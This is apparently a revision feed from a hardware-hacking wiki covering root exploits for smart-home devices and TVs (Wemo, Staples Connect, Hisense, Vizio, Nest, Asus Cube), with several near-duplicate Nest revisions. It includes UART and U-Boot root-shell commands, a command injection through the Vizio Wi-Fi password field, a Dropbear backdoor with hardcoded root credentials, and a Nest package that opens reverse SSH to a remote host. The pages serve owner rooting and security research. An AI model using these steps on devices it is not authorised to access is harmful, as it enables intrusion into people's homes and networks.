&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:BelkinWemo.png|200px|left|thumb]]&lt;br /&gt;
[[Category:Home Automation]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Belkin Wemo​.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[http://www.amazon.com/gp/product/B00BB2MMNE/ref=as_li_tl?ie=UTF8&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00BB2MMNE&amp;amp;linkCode=as2&amp;amp;tag=gtvcom-20&amp;amp;linkId=AKX4PJGS77XSRG57 Purchase the Belkin Wemo at Amazon]&lt;br /&gt;
&lt;br /&gt;
== UART Pinout ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:BelkinWemoUart.png&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
The Wemo has been the subject of many exploits, and below is another one that was believed closed by the community:&lt;br /&gt;
&lt;br /&gt;
While booting the Wemo in Recovery mode, a root console is accessible for under 1 second via UART. Within this time a command can be run to terminate the reset process, leaving us with a root shell and full device access.&lt;br /&gt;
&lt;br /&gt;
Start by connecting a UART adapter, as outlined in the above section, console speed 57600,8N1. Hold the recovery button while powering on the Wemo, and keep it held for 10 seconds.&lt;br /&gt;
&lt;br /&gt;
When seeing output regarding flash erasing, paste the command below and hit enter. Repeat until you get a root shell!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
kill -9 $(ps | grep &#039;reboot&#039;|sed -r -e &#039;s/^ ([0-9]+) [0-9]+/\1/&#039;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
A second bug allows you to boot a new kernel or execute bootloader commands by holding down buttons 0-4 when powering on. This will let you boot a new kernel, or drop to a U-Boot shell and enter your own commands.&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Staples_Connect_Hub%E2%80%8B%E2%80%8B&amp;diff=2193</id>
		<title>Staples Connect Hub​​</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Staples_Connect_Hub%E2%80%8B%E2%80%8B&amp;diff=2193"/>
		<updated>2014-08-07T01:50:33Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Exploitation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Staples_Connect_Hub.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Home Automation]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Staples Connect Hub​​.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
[http://www.staples.com/Staples-Connect-Hub-powered-by-Linksys/product_280287 Purchase the Staples Connect Hub]&lt;br /&gt;
&lt;br /&gt;
== UART Pinout ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:StaplesConnectUART.png&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
&lt;br /&gt;
Utilizing a safeguard built into U-Boot, which is the bootloader running on the Staples Connect, we can modify the systems boot parameters, and execute our own code, or drop it to a root shell.&lt;br /&gt;
&lt;br /&gt;
This works as during system bootup, the bootloader looks for environmental variables, stored on NAND flash. If it can not find these, it will execute defaults instead. The defaults feature a bootloader shell, which isn&#039;t disabled in the normal, saved environmental variables. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To ensure that the bootloader can not see the environmental variables at boot, timing is critical. By grounding out pin 29-30 while the system is booting (just at the right time), the box will boot, but fail to load the environmental variables, dropping us to a root shell. From here we can modify and resave the environmental variables, so that this process needs not be repeated.&lt;br /&gt;
&lt;br /&gt;
*Boot system&lt;br /&gt;
*Count to 4&lt;br /&gt;
*Short pins 29-30 to ground&lt;br /&gt;
*Success: &amp;quot;Hit any key to stop autoboot&amp;quot;&lt;br /&gt;
*Fail: Hang / Crash / NAND not found.&lt;br /&gt;
&lt;br /&gt;
It may take a few attempts to get this right, as timing is critical.&lt;br /&gt;
&lt;br /&gt;
Run the commands below, boots to a root console. ​&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
setenv bootargs &amp;quot;console=ttyS0,115200 init=/bin/sh mem=256M mtdparts=orion_nand:1M(uboot),32M(em-rfs),4M(em-kern),5M(pd-kern),-(pd-rfs) ubi.mtd=4,512 root=ubi0:rootfs rootfstype=ubifs rootflags=sync&amp;quot;​&lt;br /&gt;
mw.b f1010140 0xFA; if nboot 0x600000 0 0x2500000; then mw.b f1010140 0xF5; bootm 0x600000; fi​&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== SSH ==&lt;br /&gt;
Using the above to boot to a root console, edit /etc/rc.local, and add:​&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dropbear -d 222​&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Simply reboot, you can SSH on port 222 using the credentials below:&lt;br /&gt;
&lt;br /&gt;
User: root&lt;br /&gt;
Password: oemroot&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Hisense_Android_TV&amp;diff=2213</id>
		<title>Hisense Android TV</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Hisense_Android_TV&amp;diff=2213"/>
		<updated>2014-08-07T01:24:59Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:HisenseAndroidTV.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Televisions]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Hisense Android TV.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Hisense Android TV ==&lt;br /&gt;
&lt;br /&gt;
The Hisense Android TV is the first television on the market to feature &amp;quot;Google Services&amp;quot;, and runs Android 4.2.2. Using a newer Marvell chipset, the hardware is essentially identical to that of a second generation Google TV.&lt;br /&gt;
&lt;br /&gt;
== EMMC Pinout ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
file:Hisense_Vision_TV_EMMC_Pinout.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
&lt;br /&gt;
EMMC refers to an Embedded Multi-Media Card​ which has native Linux support. This means it works just like an SD card, and for our purposes, just filesystem access. Error Correcting Code and Out of Bounds data, which are usually a large hassle with NAND flash memory is handled in hardware, and is transparent, which makes it easier for reading and writing.&lt;br /&gt;
&lt;br /&gt;
Although eMMC memory can have 9 Pins (VCC, VSS, CMD, CLK, DAT0-DAT4) it can also operate on SPI / Single Bit mode using only 1 DAT line.​ In short, reading/writing an eMMC chip can be done with only 5 wires, which does not require specialized hardware or software tools.&lt;br /&gt;
&lt;br /&gt;
Required Minimum Connections:​&lt;br /&gt;
VCC, VSS, CMD, CLK, DAT0 (These lines all normally accessible via SMD resistors​)&lt;br /&gt;
​&lt;br /&gt;
GTVHacker recommends using a device like the SD Card Sniffer from Sparkfun to interface between your SD card reader, and the flash. By adding pins to the SD Card sniffer board, it facilitates easy analysis of the correct pinout, and also reduces the risk of damage due to repeated soldering to your SD card reader.&lt;br /&gt;
&lt;br /&gt;
The Hisense Android TV utilizes an EMMC flash. Using the pinouts above, you can connect the flash to a SD card reader, and rewrite it&#039;s contents. &lt;br /&gt;
&lt;br /&gt;
For the Hisense device specifically, you can mount the /system partition, which is EXT4. From here, just copy over the SuperSU APK into app, and the su binary to bin. Ensure that you properly chown the su binary (4755). This will allow for root access via ADB, and further examination of the system internals.&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Vizio_Smart_TV_(VF553XVT)%E2%80%8B&amp;diff=2215</id>
		<title>Vizio Smart TV (VF553XVT)​</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Vizio_Smart_TV_(VF553XVT)%E2%80%8B&amp;diff=2215"/>
		<updated>2014-08-05T22:02:02Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Images */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Vizio_SmartTV_VF553XVT.png|200px|left|thumb]]&lt;br /&gt;
[[Category:Televisions]]&lt;br /&gt;
This page will be dedicated to a general overview, descriptions, and information related to the Vizio Smart TV (VF553XVT)​.&lt;br /&gt;
&lt;br /&gt;
== Images ==&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
file:Vizio LCE.png&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
&lt;br /&gt;
A Local Command Execution vulnerability exists in a series of Vizio Smart TV&#039;s, among others, that allows arbitrary commands to be run as root.&lt;br /&gt;
&lt;br /&gt;
The LCE is found in the Wifi password field. Since the field is only accessible when the TV is offline, we will need to utilize a USB-UART device. Using that, we can create a shell with root access, settings 9600,8n1.&lt;br /&gt;
&lt;br /&gt;
First enter the command below, it creates a character device pointing to the USB UART that we can talk to:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
;mknod /tmp/gtvhacker c 188 0;​&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Next enter the command below, it pipes out input and output from the UART, to the character device, to the root shell:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
;bash 2&amp;gt;/tmp/gtvhacker&amp;gt;/tmp/gtvhacker&amp;lt;/tmp/gtvhacker;bash;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Exploiting_Nest_Thermostats&amp;diff=1917</id>
		<title>Exploiting Nest Thermostats</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Exploiting_Nest_Thermostats&amp;diff=1917"/>
		<updated>2014-06-24T01:22:46Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:NestRoot.png|200px|left|thumb]]&lt;br /&gt;
[[Category:Nest]]&lt;br /&gt;
This page will be dedicated to exploiting the [[http://www.amazon.com/gp/product/B009GDHYPQ/ref=as_li_tl?ie=UTF8&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B009GDHYPQ&amp;amp;linkCode=as2&amp;amp;tag=gtvcom-20&amp;amp;linkId=A3NAIO5ALZZYZNRR Nest]] Thermostat.&lt;br /&gt;
&lt;br /&gt;
== Affected Versions ==&lt;br /&gt;
All software versions of the [[http://www.amazon.com/gp/product/B009GDHYPQ/ref=as_li_tl?ie=UTF8&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B009GDHYPQ&amp;amp;linkCode=as2&amp;amp;tag=gtvcom-20&amp;amp;linkId=A3NAIO5ALZZYZNRR Nest]] Thermostat are affected by this root package. NestAttack utilizes a manufacturer loading method built into the CPU that can not be patched by software.&lt;br /&gt;
&lt;br /&gt;
== Rooting Your Nest ==&lt;br /&gt;
The attack is all played out within the Nest’s DFU mode which is briefly mentioned above. This mode allows a user to push a set of images and addresses to be loaded through the device’s USB port with a utility called “omap3_loader”. DFU mode is only intended as a catalyst to load the next stages of code, the first of which in our case is the x-loader binary. X-loader is a stage 1 boot-loader that is used on the Nest as the initial loading point for the system. X-loader handles getting the device ready to execute the second stage boot-loader that is responsible for loading up the Linux kernel. On the Nest, the second stage boot-loader is an open source piece of software widely used on embedded devices known as “U-Boot”.  We use our own custom modified version of U-Boot that is based on the GPL released Nest version to boot a Linux kernel. This Linux kernel is only used to access the Nest’s file system and add a cross compiled SSH server called Dropbear. This allows a user to connect to their Nest and obtain root access on their thermostat. After installing the SSH server, we move on to adding a SH script which checks the Nest’s virtual disk every 10 minutes for 2 files, a “host.txt” which contains a username and host in the “username@ipaddress” format as well as a “key.txt” which contains the RSA key for the SSH connection. If these files are found, the device connects out to a remote attacker at the specified address in the “host.txt” file and makes a reverse SSH connection. This allows remote access to a user’s thermostat and home network bypassing most firewalls. This process can be stopped at any time by placing an empty file with the name “stop.txt” within the root of the Nest’s virtual USB disk.&lt;br /&gt;
&lt;br /&gt;
Usage:&lt;br /&gt;
&lt;br /&gt;
    Download package  (Supports: Linux (Linux/OSX version in progress)).&lt;br /&gt;
    Extract package.&lt;br /&gt;
    Run the appropriate attack script depending on your OS. Follow instructions after executing.&lt;br /&gt;
    Enjoy&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Video ==&lt;br /&gt;
Below is a video of the root being run, and SSH installed on a Nest Thermostat&lt;br /&gt;
* [[https://www.youtube.com/watch?v=H3tmvpi4YR0]]&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
* If your device does not boot into DFU mode, unplug and retry. At times the code transfer can hang. In this scenario, it is best to retry the installation.&lt;br /&gt;
&lt;br /&gt;
== Contact ==&lt;br /&gt;
&lt;br /&gt;
You can contact us on IRC ( Freenode #GTVHacker ) or on twitter @GTVHacker&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Exploiting_Nest_Thermostats&amp;diff=1916</id>
		<title>Exploiting Nest Thermostats</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Exploiting_Nest_Thermostats&amp;diff=1916"/>
		<updated>2014-06-24T01:20:54Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Affected Versions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:NestRoot.png|200px|left|thumb]]&lt;br /&gt;
[[Category:Nest]]&lt;br /&gt;
This page will be dedicated to exploiting the Nest Thermostat.&lt;br /&gt;
&lt;br /&gt;
== Affected Versions ==&lt;br /&gt;
All software versions of the Nest Thermostat are affected by this root package. NestAttack utilizes a manufacturer loading method built into the CPU that can not be patched by software.&lt;br /&gt;
&lt;br /&gt;
== Rooting Your Nest ==&lt;br /&gt;
The attack is all played out within the Nest’s DFU mode which is briefly mentioned above. This mode allows a user to push a set of images and addresses to be loaded through the device’s USB port with a utility called “omap3_loader”. DFU mode is only intended as a catalyst to load the next stages of code, the first of which in our case is the x-loader binary. X-loader is a stage 1 boot-loader that is used on the Nest as the initial loading point for the system. X-loader handles getting the device ready to execute the second stage boot-loader that is responsible for loading up the Linux kernel. On the Nest, the second stage boot-loader is an open source piece of software widely used on embedded devices known as “U-Boot”.  We use our own custom modified version of U-Boot that is based on the GPL released Nest version to boot a Linux kernel. This Linux kernel is only used to access the Nest’s file system and add a cross compiled SSH server called Dropbear. This allows a user to connect to their Nest and obtain root access on their thermostat. After installing the SSH server, we move on to adding a SH script which checks the Nest’s virtual disk every 10 minutes for 2 files, a “host.txt” which contains a username and host in the “username@ipaddress” format as well as a “key.txt” which contains the RSA key for the SSH connection. If these files are found, the device connects out to a remote attacker at the specified address in the “host.txt” file and makes a reverse SSH connection. This allows remote access to a user’s thermostat and home network bypassing most firewalls. This process can be stopped at any time by placing an empty file with the name “stop.txt” within the root of the Nest’s virtual USB disk.&lt;br /&gt;
&lt;br /&gt;
Usage:&lt;br /&gt;
&lt;br /&gt;
    Download package  (Supports: Linux (Linux/OSX version in progress)).&lt;br /&gt;
    Extract package.&lt;br /&gt;
    Run the appropriate attack script depending on your OS. Follow instructions after executing.&lt;br /&gt;
    Enjoy&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Video ==&lt;br /&gt;
Below is a video of the root being run, and SSH installed on a Nest Thermostat&lt;br /&gt;
* [[https://www.youtube.com/watch?v=H3tmvpi4YR0]]&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
* If your device does not boot into DFU mode, unplug and retry. At times the code transfer can hang. In this scenario, it is best to retry the installation.&lt;br /&gt;
&lt;br /&gt;
== Contact ==&lt;br /&gt;
&lt;br /&gt;
You can contact us on IRC ( Freenode #GTVHacker ) or on twitter @GTVHacker&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Exploiting_Nest_Thermostats&amp;diff=1915</id>
		<title>Exploiting Nest Thermostats</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Exploiting_Nest_Thermostats&amp;diff=1915"/>
		<updated>2014-06-24T01:20:20Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:NestRoot.png|200px|left|thumb]]&lt;br /&gt;
[[Category:Nest]]&lt;br /&gt;
This page will be dedicated to exploiting the Nest Thermostat.&lt;br /&gt;
&lt;br /&gt;
== Affected Versions ==&lt;br /&gt;
All software versions of the Nest Thermostat are affected by this root package. This is because it utilizes a recovery method built into the CPU that can not be patched by software.&lt;br /&gt;
&lt;br /&gt;
== Rooting Your Nest ==&lt;br /&gt;
The attack is all played out within the Nest’s DFU mode which is briefly mentioned above. This mode allows a user to push a set of images and addresses to be loaded through the device’s USB port with a utility called “omap3_loader”. DFU mode is only intended as a catalyst to load the next stages of code, the first of which in our case is the x-loader binary. X-loader is a stage 1 boot-loader that is used on the Nest as the initial loading point for the system. X-loader handles getting the device ready to execute the second stage boot-loader that is responsible for loading up the Linux kernel. On the Nest, the second stage boot-loader is an open source piece of software widely used on embedded devices known as “U-Boot”.  We use our own custom modified version of U-Boot that is based on the GPL released Nest version to boot a Linux kernel. This Linux kernel is only used to access the Nest’s file system and add a cross compiled SSH server called Dropbear. This allows a user to connect to their Nest and obtain root access on their thermostat. After installing the SSH server, we move on to adding a SH script which checks the Nest’s virtual disk every 10 minutes for 2 files, a “host.txt” which contains a username and host in the “username@ipaddress” format as well as a “key.txt” which contains the RSA key for the SSH connection. If these files are found, the device connects out to a remote attacker at the specified address in the “host.txt” file and makes a reverse SSH connection. This allows remote access to a user’s thermostat and home network bypassing most firewalls. This process can be stopped at any time by placing an empty file with the name “stop.txt” within the root of the Nest’s virtual USB disk.&lt;br /&gt;
&lt;br /&gt;
Usage:&lt;br /&gt;
&lt;br /&gt;
    Download package  (Supports: Linux (Linux/OSX version in progress)).&lt;br /&gt;
    Extract package.&lt;br /&gt;
    Run the appropriate attack script depending on your OS. Follow instructions after executing.&lt;br /&gt;
    Enjoy&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Video ==&lt;br /&gt;
Below is a video of the root being run, and SSH installed on a Nest Thermostat&lt;br /&gt;
* [[https://www.youtube.com/watch?v=H3tmvpi4YR0]]&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
* If your device does not boot into DFU mode, unplug and retry. At times the code transfer can hang. In this scenario, it is best to retry the installation.&lt;br /&gt;
&lt;br /&gt;
== Contact ==&lt;br /&gt;
&lt;br /&gt;
You can contact us on IRC ( Freenode #GTVHacker ) or on twitter @GTVHacker&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Exploiting_Nest_Thermostats&amp;diff=1914</id>
		<title>Exploiting Nest Thermostats</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Exploiting_Nest_Thermostats&amp;diff=1914"/>
		<updated>2014-06-24T01:19:29Z</updated>

		<summary type="html">&lt;p&gt;CJ: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:Nest This page will be dedicated to exploiting the Nest Thermostat.  == Affected Versions == All so...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:nest.png|200px|left|thumb]]&lt;br /&gt;
[[Category:Nest]]&lt;br /&gt;
This page will be dedicated to exploiting the Nest Thermostat.&lt;br /&gt;
&lt;br /&gt;
== Affected Versions ==&lt;br /&gt;
All software versions of the Nest Thermostat are affected by this root package. This is because it utilizes a recovery method built into the CPU that can not be patched by software.&lt;br /&gt;
&lt;br /&gt;
== Rooting Your Nest ==&lt;br /&gt;
The attack is all played out within the Nest’s DFU mode which is briefly mentioned above. This mode allows a user to push a set of images and addresses to be loaded through the device’s USB port with a utility called “omap3_loader”. DFU mode is only intended as a catalyst to load the next stages of code, the first of which in our case is the x-loader binary. X-loader is a stage 1 boot-loader that is used on the Nest as the initial loading point for the system. X-loader handles getting the device ready to execute the second stage boot-loader that is responsible for loading up the Linux kernel. On the Nest, the second stage boot-loader is an open source piece of software widely used on embedded devices known as “U-Boot”.  We use our own custom modified version of U-Boot that is based on the GPL released Nest version to boot a Linux kernel. This Linux kernel is only used to access the Nest’s file system and add a cross compiled SSH server called Dropbear. This allows a user to connect to their Nest and obtain root access on their thermostat. After installing the SSH server, we move on to adding a SH script which checks the Nest’s virtual disk every 10 minutes for 2 files, a “host.txt” which contains a username and host in the “username@ipaddress” format as well as a “key.txt” which contains the RSA key for the SSH connection. If these files are found, the device connects out to a remote attacker at the specified address in the “host.txt” file and makes a reverse SSH connection. This allows remote access to a user’s thermostat and home network bypassing most firewalls. This process can be stopped at any time by placing an empty file with the name “stop.txt” within the root of the Nest’s virtual USB disk.&lt;br /&gt;
&lt;br /&gt;
Usage:&lt;br /&gt;
&lt;br /&gt;
    Download package  (Supports: Linux (Linux/OSX version in progress)).&lt;br /&gt;
    Extract package.&lt;br /&gt;
    Run the appropriate attack script depending on your OS. Follow instructions after executing.&lt;br /&gt;
    Enjoy&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Video ==&lt;br /&gt;
Below is a video of the root being run, and SSH installed on a Nest Thermostat&lt;br /&gt;
* [[https://www.youtube.com/watch?v=H3tmvpi4YR0]]&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
* If your device does not boot into DFU mode, unplug and retry. At times the code transfer can hang. In this scenario, it is best to retry the installation.&lt;br /&gt;
&lt;br /&gt;
== Contact ==&lt;br /&gt;
&lt;br /&gt;
You can contact us on IRC ( Freenode #GTVHacker ) or on twitter @GTVHacker&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:NestRoot.png&amp;diff=1913</id>
		<title>File:NestRoot.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:NestRoot.png&amp;diff=1913"/>
		<updated>2014-06-24T01:16:30Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Nest&amp;diff=1912</id>
		<title>Nest</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Nest&amp;diff=1912"/>
		<updated>2014-06-24T01:14:01Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:nest.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Nest]]&lt;br /&gt;
This page will be dedicated to a general overview of the Nest Thermostat, descriptions, and information related to the Nest Thermostat.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
&lt;br /&gt;
== GPL ==&lt;br /&gt;
Nest maintains a fairly accurate (but far from perfect) repository of GPL code which can be found at [[https://nest.com/legal/compliance/]].&lt;br /&gt;
&lt;br /&gt;
== Exploiting Nest Thermostats ==&lt;br /&gt;
* [[Exploiting Nest Thermostats]]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:Nest.jpg&amp;diff=1911</id>
		<title>File:Nest.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:Nest.jpg&amp;diff=1911"/>
		<updated>2014-06-24T01:13:48Z</updated>

		<summary type="html">&lt;p&gt;CJ: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Nest&amp;diff=1910</id>
		<title>Nest</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Nest&amp;diff=1910"/>
		<updated>2014-06-24T01:12:46Z</updated>

		<summary type="html">&lt;p&gt;CJ: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:Nest This page will be dedicated to a general overview of the Nest Thermostat, descriptions, a...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Roku-pile.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Nest]]&lt;br /&gt;
This page will be dedicated to a general overview of the Nest Thermostat, descriptions, and information related to the Nest Thermostat.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
&lt;br /&gt;
== GPL ==&lt;br /&gt;
Nest maintains a fairly accurate (but far from perfect) repository of GPL code which can be found at [[https://nest.com/legal/compliance/]].&lt;br /&gt;
&lt;br /&gt;
== Exploiting Nest Thermostats ==&lt;br /&gt;
* [[Exploiting Nest Thermostats]]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1905</id>
		<title>Asus Cube</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Asus_Cube&amp;diff=1905"/>
		<updated>2014-01-01T23:30:31Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Update History */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Asus_cube.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Asus]]&lt;br /&gt;
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.&lt;br /&gt;
&lt;br /&gt;
[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&amp;amp;tag=gtvcom-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=390957&amp;amp;creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]&lt;br /&gt;
&lt;br /&gt;
== Specs ==&lt;br /&gt;
These specifications are unverified, but based off of the SOC this should hold to be &amp;quot;trueish&amp;quot;.&lt;br /&gt;
We will update this once the hardware ships.&lt;br /&gt;
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU&lt;br /&gt;
*1 GB DDR3 Memory &lt;br /&gt;
*4 GB Flash NAND&lt;br /&gt;
*Two USB Ports&lt;br /&gt;
*IR Blaster&lt;br /&gt;
&lt;br /&gt;
== Cuberoot ==&lt;br /&gt;
[[File:Cuberoot.png|200px|right|thumb]]&lt;br /&gt;
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within  a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.&lt;br /&gt;
&lt;br /&gt;
This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.&lt;br /&gt;
&lt;br /&gt;
Cuberoot will:&lt;br /&gt;
*Root your Asus Cube.&lt;br /&gt;
*Install SuperSu.&lt;br /&gt;
*Modify the Flash Player to bypass website blocks on streaming media sites.&lt;br /&gt;
*Disable automatic updates.&lt;br /&gt;
*Collect anonymous statistical information about your device.&lt;br /&gt;
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.&lt;br /&gt;
&lt;br /&gt;
Download [http://download.gtvhacker.com/file/asus/Cuberoot.apk Here]&lt;br /&gt;
&lt;br /&gt;
== Gallery ==&lt;br /&gt;
